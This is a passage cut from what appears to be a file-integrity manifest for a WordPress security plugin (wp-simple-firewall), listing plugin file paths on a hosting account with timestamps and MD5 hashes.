ackup.php\":{\"d\":1567917024,\"h\":\"b423f414ecb53c6a80a1e1d831a3ff2b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Realtime\\/Files\\/Process.php\":{\"d\":1567917024,\"h\":\"fb05c6c45a0855773187e558613904d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Realtime\\/Files\\/Verify.php\":{\"d\":1567917024,\"h\":\"00e0b517db2da93d382f980de35451fa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Realtime\\/Files\\/Revert.php\":{\"d\":1567917024,\"h\":\"6d64d6112c470d279a456d00ea4b907b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Realtime\\/Files\\/TestWritable.php\":{\"d\":1567917024,\"h\":\"c7e36387fe098d2e050bd2399580d107\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/Snapshots\\/Store.php\":{\"d\":1567917024,\"h\":\"c74dcc534ba41983c812bd4fa87ee451\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/Snapshots\\/StoreFormatUpgrade.php\":{\"d\":1567917024,\"h\":\"d9d67618a56741c0218a1faf86f4e8be\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/ScanResults\\/Clean.php\":{\"d\":1567917024,\"h\":\"0601a2231ab1c6c3c738d14af7e50277\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/ScanAssetDir.php\":{\"d\":1567917024,\"h\":\"6a31e0267fcfc3feff5ee121239db887\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/ItemScanner.php\":{\"d\":1567917024,\"h\":\"ab7cb74ad54d77573c14c816d29abb98\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/ScanActionVO.php\":{\"d\":1567917024,\"h\":\"adbe34a2529b143959070765500a7dd9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/DiffHashes.php\":{\"d\":1567917024,\"h\":\"b74c14be4f438444b8b19abe1f04759a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/PluginWporgScanner.php\":{\"d\":1567917024,\"h\":\"a7b5a4205aa51c19ea919de74cd3fd1b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/ConvertResultsToVos.php\":{\"d\":1567917024,\"h\":\"033fdf0f91d3db876344dc2236a6b7c3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/Repair.php\":{\"d\":1567917024,\"h\":\"f9685db83aeb51081f89e6a78fbd8239\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/ResultsSet.php\":{\"d\":1567917024,\"h\":\"4dc60f046cb86aec9e8c74ccd910e20b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/ScannerThemes.php\":{\"d\":1567917024,\"h\":\"3da7a097d3092b0f5a6dfcb1ed75a479\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/ScannerPlugins.php\":{\"d\":1567917024,\"h\":\"b6e9285ad99167884860c4213c6e0a07\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/ConvertVosToResults.php\":{\"d\":1567917024,\"h\":\"c0d16246cb49af98f445d35c38e00955\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/BuildScanAction.php\":{\"d\":1567917024,\"h\":\"a76d02785ad5b7eb89d62f9b48716799\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/ScannerBase.php\":{\"d\":1567917024,\"h\":\"ffbed31e8cd2e3296f2a10bce7ec0450\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/ResultItem.php\":{\"d\":1567917024,\"h\":\"72513a5ae9be39f01c9b72407fe10764\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ptg\\/Scan.php\":{\"d\":1567917024,\"h\":\"60453df1600c6d924b1724ae47d94dc9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Common\\/AsyncScansController.php\":{\"d\":1567917024,\"h\":\"b665f9d3b2b4785bf7e5701d56504a2d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Common\\/ScanActionConsumer.php\":{\"d\":1567917024,\"h\":\"871b6207c0b088885e7a22c18db5d34f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Common\\/ScansJobVO.php\":{\"d\":1567917024,\"h\":\"7faebf2ce3e31bb7ee92b3b51101f59f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Common\\/ScanLauncher.php\":{\"d\":1567917024,\"h\":\"c363428a69d459bac5df6200a55a90af\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/WpVulnDb\\/WpVulnVO.php\":{\"d\":1567917024,\"h\":\"ad9350625f0b2ba819a11b27dc26a12c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/WpVulnDb\\/RetrieveForItem.php\":{\"d\":1567917024,\"h\":\"988e3809e2f72394ed061c2b8e7de6d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/ItemScanner.php\":{\"d\":1567917024,\"h\":\"3dcbdc2f80a33cb8acc303e5771bfc8f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/Scanner.php\":{\"d\":1567917024,\"h\":\"22fac255e3f19431b862d3b92649b269\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/ScanActionVO.php\":{\"d\":1567917024,\"h\":\"7d81b5dd9aa0ba7db6ca9b269c8f6088\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/PluginScanner.php\":{\"d\":1567917024,\"h\":\"0b4a2c775fb706c2371e23b7a651145a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/ConvertResultsToVos.php\":{\"d\":1567917024,\"h\":\"78442cd72ab9e28c2e16b9dd99e08d25\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/Repair.php\":{\"d\":1567917024,\"h\":\"494b56fbe030ad1725bb01ddb8e8b5d6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/ResultsSet.php\":{\"d\":1567917024,\"h\":\"3a67f49accbf4d15d24874ac700c6c5e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/ThemeScanner.php\":{\"d\":1567917024,\"h\":\"08e0ff4d36075151e2b7d8749dd173d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/ConvertVosToResults.php\":{\"d\":1567917024,\"h\":\"6b1a0dbfce266f05b706be3317eadddc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/BuildScanAction.php\":{\"d\":1567917024,\"h\":\"01a34ea2124ceb3e07402bd73490286b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/ResultItem.php\":{\"d\":1567917024,\"h\":\"43f97601a50f9983b495105d0b7b82ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wpv\\/Scan.php\":{\"d\":1567917024,\"h\":\"e884c42fe302c3d38f83deefc8ef2ff5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Statistics\\/Options.php\":{\"d\":1567917024,\"h\":\"20152267f30625f35b53dbb868b3d861\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Statistics\\/Strings.php\":{\"d\":1567917024,\"h\":\"e1c3534893a8dde1fd6a813f5ecbe508\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Sessions\\/Options.php\":{\"d\":1567917024,\"h\":\"790f45113e3035a79aa36b489eb51fff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Sessions\\/Strings.php\":{\"d\":1567917024,\"h\":\"fa049bd6e873b211f202d4a4d3aaf34d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Headers\\/Options.php\":{\"d\":1567917024,\"h\":\"23b3e3c5884253cc6f4802a0977c9d39\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Headers\\/Strings.php\":{\"d\":1567917024,\"h\":\"451a64ad97dd0cf0d0690cbd22b4ef89\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/BotTrack\\/TrackFakeWebCrawler.php\":{\"d\":1567917024,\"h\":\"5e1b1b621c8fc6ca830cb1648925c685\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/BotTrack\\/TrackXmlRpc.php\":{\"d\":1567917024,\"h\":\"4785ba20f7d170326dc15286e840bce6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/BotTrack\\/TrackUserAgent.php\":{\"d\":1567917024,\"h\":\"91941ab1c193ed99ac292c94aed09877\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/BotTrack\\/TrackLinkCheese.php\":{\"d\":1567917024,\"h\":\"1573ab76e985746dbf5e5ac3d33d54cc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/BotTrack\\/Base.php\":{\"d\":1567917024,\"h\":\"b76dd9d3239d591820f461a843cb30d9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/BotTrack\\/TrackLoginFailed.php\":{\"d\":1567917024,\"h\":\"875196cdd42008c204d9f6837fdd1735\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/BotTrack\\/TrackLoginInvalid.php\":{\"d\":1567917024,\"h\":\"8c73ace61d0289c06077d093f3ac19f7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/BotTrack\\/Track404.php\":{\"d\":1567917024,\"h\":\"8fb7edce51bc51f92f8d7b1216d1af31\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/Components\\/UnblockIpByFlag.php\":{\"d\":1567917024,\"h\":\"371f8ee075ae93d16e6221b23e3c8b1e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/AdminNotices.php\":{\"d\":1567917024,\"h\":\"f61995fe28d600d92c4c693972376206\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/AjaxHandler.php\":{\"d\":1567917024,\"h\":\"d10263ed9e6170c9e662540f8eadd497\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/Options.php\":{\"d\":1567917024,\"h\":\"2b1b3f6d0a34c8caef87a9b41c7b3670\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/IPs\\/Strings.php\":{\"d\":1567917024,\"h\":\"5a25aeab463e835e53633b182363e178\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/License\\/AjaxHandler.php\":{\"d\":1567917024,\"h\":\"5ec16d4d3cb31d7c08d1304739c33f33\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/License\\/Options.php\":{\"d\":1567917024,\"h\":\"febacace70b5a8d678fd67bc432cf633\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/License\\/Strings.php\":{\"d\":1567917024,\"h\":\"6d24701f65389b011299557727764a08\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Plugin\\/Components\\/PluginBadge.php\":{\"d\":1567917024,\"h\":\"f6c98f98cc0257bf114ae3ea02e6e38d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Plugin\\/Components\\/BadgeWidget.php\":{\"d\":1567917024,\"h\":\"fa672f6da10f0c71f803d2cb063b4fee\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Plugin\\/AdminNotices.php\":{\"d\":1567917024,\"h\":\"0134d1f95e1aba0f2091bfd3ff03a592\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Plugin\\/AjaxHandler.php\":{\"d\":1567917024,\"h\":\"0bccff0546c628d11f2d558a56539153\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Plugin\\/Options.php\":{\"d\":1567917024,\"h\":\"607bea2d10437e1c55233190ebe40b5d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Plugin\\/Strings.php\":{\"d\":1567917024,\"h\":\"1ddd482650e44c0e341c43c6a3927e61\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/AuditTrail\\/Auditors\\/Posts.php\":{\"d\":1567917025,\"h\":\"8f23ef4085f37c06efe58bd0a091f2f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/AuditTrail\\/Auditors\\/Themes.php\":{\"d\":1567917025,\"h\":\"e51037ebd903ec7e009c4fb6a1fd7bf7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/AuditTrail\\/Auditors\\/Emails.php\":{\"d\":1567917025,\"h\":\"59d7de0cda427702e345e5d163cad1df\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/AuditTrail\\/Auditors\\/Base.php\":{\"d\":1567917025,\"h\":\"10743ebaf16cb000a320c61d12104ae7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/AuditTrail\\/Auditors\\/Plugins.php\":{\"d\":1567917025,\"h\":\"87894380a2f21a7f01bdd52d78daf306\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/AuditTrail\\/Auditors\\/Wordpress.php\":{\"d\":1567917025,\"h\":\"7233d522c7b91b6ecdc1354c7e889755\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/AuditTrail\\/Auditors\\/Users.php\":{\"d\":1567917025,\"h\":\"b64a978c1d4ab792f3959ca1dcbdc0ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/AuditTrail\\/AjaxHandler.php\":{\"d\":1567917024,\"h\":\"b732eade9effe1b7291d4eae74156591\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/AuditTrail\\/Options.php\":{\"d\":1567917024,\"h\":\"0b29c39809eacf3b14811bac195cacf9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/AuditTrail\\/Strings.php\":{\"d\":1567917024,\"h\":\"3b95f875c9a20c95f30c984ce54c40bb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Events\\/AjaxHandler.php\":{\"d\":1567917024,\"h\":\"a0a9f5a0e97604c196b173df4eb58a89\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Events\\/Options.php\":{\"d\":1567917024,\"h\":\"cd6a084bdf6151f90d344a42b58cc5b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Events\\/Strings.php\":{\"d\":1567917024,\"h\":\"30c90b1888115163cb4a7b221ad2f5b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/CommentsFilter\\/Scan\\/Human.php\":{\"d\":1567917024,\"h\":\"01dd1ae9972d8fc7996c09c757806590\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/CommentsFilter\\/Scan\\/Scanner.php\":{\"d\":1567917024,\"h\":\"7644eac09b9341d666227ab86a0c47b2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/CommentsFilter\\/Scan\\/Bot.php\":{\"d\":1567917024,\"h\":\"674c0bc29e5142087adce370d9ee3282\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/CommentsFilter\\/Scan\\/IsEmailTrusted.php\":{\"d\":1567917024,\"h\":\"6a0010a69d557d4a35221d587d4e9d79\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/CommentsFilter\\/AdminNotices.php\":{\"d\":1567917024,\"h\":\"717873e21927bbbcb927b8d8e16dcc02\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/CommentsFilter\\/Options.php\":{\"d\":1567917024,\"h\":\"25c4c2a0250bac918c4b0a5f5464d208\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/CommentsFilter\\/Strings.php\":{\"d\":1567917024,\"h\":\"ab785018314b067fd06d39a903a4517c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Base\\/AdminNotices.php\":{\"d\":1567917025,\"h\":\"0af6a4b9507ddf61e3384219bd59abda\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Base\\/AjaxHandlerShield.php\":{\"d\":1567917025,\"h\":\"a95dd044605fff5466e220ea41fdf7ec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Base\\/ShieldOptions.php\":{\"d\":1567917025,\"h\":\"9e3158020ae15a8fc7fdbb60adcc1db3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Base\\/Options.php\":{\"d\":1567917025,\"h\":\"a59fd908c9236a0d99eab6bea9bfcdbf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Base\\/BaseModCon.php\":{\"d\":1567917025,\"h\":\"74794232c8cf09880ecdf8e15b6bbef4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Base\\/AjaxHandlerBase.php\":{\"d\":1567917025,\"h\":\"4d5d96cb86e5f45246ca79e4ed133dce\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Base\\/BaseProcessor.php\":{\"d\":1567917025,\"h\":\"37da95ab1cbdbf40a794c887f7bcc343\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Base\\/Strings.php\":{\"d\":1567917025,\"h\":\"bf635ce32fee82eb71780d6ebe01eca1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Email\\/Options.php\":{\"d\":1567917025,\"h\":\"4fcb81fba85bbed7bf37599b939c35e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Email\\/Strings.php\":{\"d\":1567917025,\"h\":\"b28563352341a35ae783a4d1611e6087\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/HackGuard\\/AjaxHandler.php\":{\"d\":1567917024,\"h\":\"890a7f57a4ed3424f0c6ee3a9aceea4b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/HackGuard\\/Options.php\":{\"d\":1567917024,\"h\":\"c1b635bbec212ae7f92af161f9d4c8aa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/HackGuard\\/Strings.php\":{\"d\":1567917024,\"h\":\"adc85b2ed73e7edaf9f6daa94aa01f6d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/GeoIp\\/Lookup.php\":{\"d\":1567917025,\"h\":\"8ce5210f5233200a3e426fdcf62874df\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Insights\\/Options.php\":{\"d\":1567917024,\"h\":\"4e7e784c3d825376a113caac6d45df66\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Insights\\/Strings.php\":{\"d\":1567917024,\"h\":\"fe7dcae5ba57d0feecf5d06bcd9f76df\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/SecurityAdmin\\/AdminNotices.php\":{\"d\":1567917024,\"h\":\"d279c1d0faccd3985184505a9d53423a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/SecurityAdmin\\/AjaxHandler.php\":{\"d\":1567917024,\"h\":\"436b8787a52b7b118cacad20a05f0cc4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/SecurityAdmin\\/Options.php\":{\"d\":1567917024,\"h\":\"1c9f5b7feb140413ee12917e6c5ed476\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/SecurityAdmin\\/Strings.php\":{\"d\":1567917024,\"h\":\"fc330cdb0f566d5fed1cf2ee7857b67c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Autoupdates\\/AjaxHandler.php\":{\"d\":1567917024,\"h\":\"3492c71157aaa08ca752af052b76c40c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Autoupdates\\/Options.php\":{\"d\":1567917024,\"h\":\"3e95f364a5dd6101245a5064d7605582\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Autoupdates\\/Strings.php\":{\"d\":1567917024,\"h\":\"108489b71fcfbaffbea0e3c0d4e299c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Lockdown\\/Options.php\":{\"d\":1567917024,\"h\":\"5bf9aaf7f5faf039e2801e47fb35023c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/Lockdown\\/Strings.php\":{\"d\":1567917024,\"h\":\"a91497d36beb96e9d74069da3d348abe\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/LoginGuard\\/AdminNotices.php\":{\"d\":1567917025,\"h\":\"c69163a035ed814ee260939b1086348a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/LoginGuard\\/AjaxHandler.php\":{\"d\":1567917025,\"h\":\"512fb69cff91be6982e15efd8f410fff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Modules\\/LoginGuard\